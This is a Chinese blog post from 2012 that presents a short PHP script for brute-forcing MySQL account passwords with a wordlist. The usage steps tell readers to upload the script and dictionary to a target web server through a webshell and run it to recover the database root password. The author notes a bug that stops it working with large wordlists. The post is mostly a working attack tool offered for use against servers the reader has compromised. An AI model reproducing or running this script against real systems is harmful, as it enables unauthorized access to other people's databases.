PHP Mysql 密码暴力破解脚本
发布:独自等待 | 发布时间: 2012年1月28日<?
set_time_limit(0); //脚本不超时
$user="root"; //用户名
$passwd=file("password.txt"); //密码字典
for($i=0;$i<count($passwd);$i++){
$pass=$passwd[$i];
connect($user,$pass);
flush();
}
echo "扫描结束!";
function connect($user,$pass) {
$conn=@mysql_connect("localhost",$user,$pass);
if($conn){
echo "<font color=´#0000FF´><b>得到密码:<font color=´#FF0000´>".$pass."</font>!!!</b></font>";
exit();
}
else {
echo $pass.´<br>´;
}
}
?>
代码简单的不能再简单了,就不解释了,功能很简单,传到WebShell上去暴力破解本机的MySql数据库Root或其它用户的密码,因为是破解本机,所以速度奇快无比,貌似还有点效果,这个以前有人发过,这个是我改过的。
已知有一处Bug,不清楚为何,密码数量少的时候,准确率100%,但是当密码数量达到5000以上时,准确率0%,明明正确的密码,却不显示正 确,除非 你把这个密码放在字典最末尾,才显示正确,不清楚是什么原因造成的,开始以为是暴破间隔时间太短,加了延时函数,还是这样。。。
或许只是我个别原因?各位试试就知道了。
用法:
1、修改 PHP 代码中的用户名
2、准备字典 password.txt,每行一个,理论上支持无数行。
3、将脚本和字典一起传到目标Web服务器上,访问该脚本,即开始暴力破解,破解结果实时输出,盯着就行了。
link:http://lcx.cc/?FoxNews=2162.html
- 相关文章:
PHP Web 木马扫描器 - 安全测试工具 (2012-1-16 17:2:16)
文件包含与注入利用总结 (2012-1-11 10:32:2)
常见Php脚本漏洞形成防范详细解析 (2011-12-19 15:38:1)
LAMP一键安装包-CentOS 5/6下自动编译安装Apache,MySQL,PHP (2011-12-14 10:23:32)
PHP 服务器环境变量 $_ENV (2011-12-6 16:7:12)
mysql能用localhost连接不能使用127.0.0.1连接的解决办法 (2011-11-30 10:19:53)
PHP安全之LFI漏洞GetShell方法大阅兵 (2011-11-2 8:57:55)
MySQL Root密码另类破解 (2011-10-21 15:16:8)
php代码下载shell可过一流信息拦截 (2011-8-17 13:1:6)
Mysql 5.5 无法远程登陆:Can't get hostname for your address (2011-8-8 14:45:20)
发表评论
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。
|
